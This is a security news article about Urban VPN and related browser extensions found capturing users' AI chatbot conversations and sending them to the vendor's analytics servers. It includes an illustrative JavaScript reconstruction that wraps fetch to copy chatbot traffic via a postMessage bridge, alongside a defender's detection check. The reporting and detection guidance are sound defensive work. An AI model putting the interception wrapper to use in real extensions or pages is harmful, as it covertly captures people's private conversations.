Browser ‘privacy’ extensions caught logging AI chats from millions of users

Key Takeaways

  • Koi Security found four popular Urban-branded extensions intercepting and exfiltrating chatbot conversations.
  • More than 8 million installs across Chrome and Edge, with data collection enabled by default and no user-facing opt-out.
  • Researchers say the extensions harvested conversations from major AI platforms, despite Chrome Web Store policies prohibiting such data sharing.

The discovery that four widely installed browser extensions were quietly siphoning off AI chat conversations has forced an uncomfortable question into the open: who’s actually watching the watchers? Koi Security’s analysis of extensions distributed under the Urban and 1ClickVPN brands shows the line between “privacy tool” and “surveillance helper” can be frighteningly thin, especially when an extension claims to protect you from the very risks it creates.

The four extensions—Urban VPN Proxy, 1ClickVPN Proxy, Urban Browser Guard, and Urban Ad Blocker—were all available through both the Chrome Web Store and Microsoft Edge Add-ons. On the surface, they looked like the usual assortment of free VPNs and blockers that compete for ranking in those stores. Under the hood, however, Koi Security found hardcoded instructions to intercept and capture browser interactions with major AI platforms.

Idan Dardikman, Koi’s co-founder and CTO, outlined the findings in a recent report. He noted that Urban VPN Proxy alone targeted conversations across ten AI tools. That roster included ChatGPT, Claude, Gemini, Microsoft Copilot, Perplexity, DeepSeek, Grok, and Meta AI. It’s a list that reads like the modern knowledge worker’s daily rotation, which explains why this incident has hit a nerve among security teams.

The mechanism was equal parts simple and aggressive. The extensions monitored browser tabs; when a user opened a supported AI service, the extension injected what Koi calls an “executor” script into the page itself. That script overrode two core browser APIs, fetch() and XMLHttpRequest, replacing them with wrappers that call the originals and then read the request and response bodies on the way through. Anyone who has ever debugged a web app knows those APIs are the lifeblood of client–server communication. Override them in the page's own JavaScript context and you see every prompt the page sends and every reply it receives, with no need to touch TLS, because the hook sits before encryption and after decryption. One might expect a VPN to manipulate network flows, but not by rewriting browser functions on a per‑page basis.

Once the script intercepted the request and response data, it parsed the results, wrapped them with a PANELOS_MESSAGE identifier, and passed them via window.postMessage to the extension’s content script. That hop is needed because the injected script runs in the page’s own JavaScript world while the content script runs in the extension’s isolated world; postMessage is the standard bridge between the two. From there, the content script forwarded the data to a background service worker that sent it to analytics.urban-vpn.com and stats.urban-vpn.com. The flow is almost banal in its efficiency. A small detail, but worth noting: none of this was gated behind an on/off toggle. The harvesting was always on.
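As an added example, and not code from Koi Security’s report or from the Urban VPN extensions themselves, the JavaScript below models the executor, the postMessage bridge and the background hand-off inside a constructed mock of the page world, then applies the check a defender can paste into DevTools: a genuine window.fetch stringifies as native code, a wrapper does not. Only the PANELOS_MESSAGE tag and the analytics.urban-vpn.com endpoint name come from the report; the target host list, the mock window, the sample chat request and its path, and the use of a bound function to stand in for the browser’s built-in fetch are all assumptions made for illustration. Only fetch is wrapped here; the XMLHttpRequest side follows the same shape by patching XMLHttpRequest.prototype.open and send and reading responseText on load.

```javascript
// Added example, not code from Koi Security or from the Urban VPN extensions.
// Models the executor -> postMessage -> content script -> background flow in a
// constructed mock of the page world, then runs the defender's check.
// Host list, mock window and sample request are assumptions for illustration;
// only the tag and the endpoint name are taken from the report.

const EXFIL_TAG = "PANELOS_MESSAGE";            // identifier Koi reports
const EXFIL_HOST = "analytics.urban-vpn.com";   // one endpoint Koi names
const TARGET_HOSTS = ["chatgpt.com", "claude.ai", "gemini.google.com"]; // assumed

// Page-world "executor": wraps window.fetch so every request/response pair to a
// target host is copied out via postMessage. The page still gets its response.
function installExecutor(win) {
  const originalFetch = win.fetch;
  win.fetch = async function (input, init) {
    const url = typeof input === "string" ? input : input.url;
    const response = await originalFetch.call(win, input, init);
    const host = new URL(url).hostname;
    if (TARGET_HOSTS.some((h) => host === h || host.endsWith("." + h))) {
      const body = await response.clone().text(); // read a clone, not the original
      win.postMessage(
        { type: EXFIL_TAG, url, request: init && init.body, response: body },
        "*"
      );
    }
    return response;
  };
}

// Content-script side of the bridge: accept tagged messages and hand them to the
// background worker. The worker's network call is modelled as a queue entry.
function installBridge(win, outbox, destination) {
  win.addEventListener("message", (event) => {
    if (!event.data || event.data.type !== EXFIL_TAG) return;
    outbox.push({ destination, payload: event.data });
  });
}

// Defender's check, runnable in DevTools as
//   Function.prototype.toString.call(window.fetch)
// A built-in stringifies as "[native code]"; a JavaScript wrapper shows its source.
// Caveat: a script that also patches Function.prototype.toString defeats this,
// so a clean result is weak evidence while a dirty result is strong evidence.
function fetchLooksPatched(win) {
  return !Function.prototype.toString.call(win.fetch).includes("[native code]");
}

// Constructed mock of the page world. A bound function stringifies as native
// code, which stands in for the browser's built-in fetch offline.
function makeMockPage(cannedResponse) {
  const listeners = [];
  return {
    fetch: (async function () {
      return { clone() { return this; }, async text() { return cannedResponse; } };
    }).bind(null),
    postMessage(data, origin) { listeners.forEach((fn) => fn({ data, origin })); },
    addEventListener(type, fn) { if (type === "message") listeners.push(fn); },
  };
}

// Walk through the flow once: a chat request to a target host is copied to the
// outbox, an unrelated request is not, and the fetch wrapper is detectable.
async function demo() {
  const win = makeMockPage('{"reply":"Here is the HR note you asked for."}');
  const outbox = [];
  const before = fetchLooksPatched(win);
  installBridge(win, outbox, EXFIL_HOST);
  installExecutor(win);
  const after = fetchLooksPatched(win);
  // Constructed sample requests; the paths are not real API routes.
  await win.fetch("https://chatgpt.com/api/chat", {
    method: "POST",
    body: '{"prompt":"Draft an HR note"}',
  });
  await win.fetch("https://example.com/unrelated", { method: "GET" });
  return { before, after, outbox };
}
```

Run demo() to see one captured exchange land in the outbox tagged for analytics.urban-vpn.com while the unrelated request passes untouched. The toString check is the quick triage on a live chatbot tab; a real page-world hook can hide from it by patching toString as well, so an extension inventory from enterprise policy or the browser’s management reporting remains the authoritative source.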

Dardikman said the only way to stop the collection was to uninstall the extensions entirely. That’s where it gets tricky for enterprises. Many users don’t remember installing free VPNs or ad blockers—it’s the kind of convenience-driven click-through behavior that haunts security trainings. And as Koi points out, users who installed Urban VPN before mid-2024 never even saw the new consent prompt added in version 5.5.0, because it arrived silently.

Urban VPN did disclose AI data collection in that prompt and in its privacy policy. But the Chrome Web Store listing wasn’t explicit about AI conversations, and it asserted that data wasn’t being sold to third parties outside approved cases. According to Dardikman, the privacy policy itself says the opposite: that the data is sold for marketing. That contradiction alone could keep a regulatory lawyer busy for hours.

Koi’s findings build on previous investigative work by security researcher Wladimir Palant and Secure Annex’s John Tuckner. Their earlier reporting documented BiScience—Urban VPN’s affiliated company—collecting user clickstream and browsing history data. Koi argues this latest discovery suggests BiScience expanded from browsing history into AI conversation content. It’s an uncomfortable escalation, particularly given the sensitivity of many AI chats. Anyone who has watched employees use AI systems to draft HR notes or troubleshoot customer issues knows how easily confidential material slips into prompts.

The Register reached out to Urban VPN, BiScience, and 1ClickVPN, but all email addresses bounced. Google also hasn’t commented. Silence doesn’t help here, especially since Urban VPN Proxy carried a Featured Badge in the Chrome Web Store. A human reviewer granted that badge. Did they examine the code that captured conversations with Google’s own Gemini platform? Or did they decide it wasn’t a violation? It’s a fair question, though not one Google seems eager to answer.

Chrome Web Store policies explicitly prohibit transferring or selling user data to third‑party data brokers. Yet the enforcement appears tangled in a loophole tied to Google’s Limited Use policy. That policy allows data transfers to third parties under very narrow circumstances, such as security purposes or a business ownership change. Those exceptions don’t cover brokers like BiScience.

Palant, in his own post, argues that BiScience and partners rely on user-facing features—like ad blocking or safe browsing—to claim that the data collection is “necessary to providing or improving your single purpose,” an exception that loosens restrictions. Or they claim security exceptions outright. The problem, he says, is that Chrome Web Store appears to accept these claims when they appear in privacy policies or disclosures, even if the technical behavior tells a different story. Anyone who has reviewed hundreds of extension manifests knows how easy it is to bury intent under the guise of “improving user protection.”

Still, the real operational takeaway is blunt. If any of these extensions are installed on corporate devices—or employee-owned devices accessing corporate systems—assume AI conversations since mid-2024 may have been captured and shared with third parties. And while this incident revolves around a set of Urban-branded extensions, it reveals a deeper challenge: enterprise security teams have limited visibility into how browser extensions behave once installed. It’s almost an attack surface hiding in plain sight.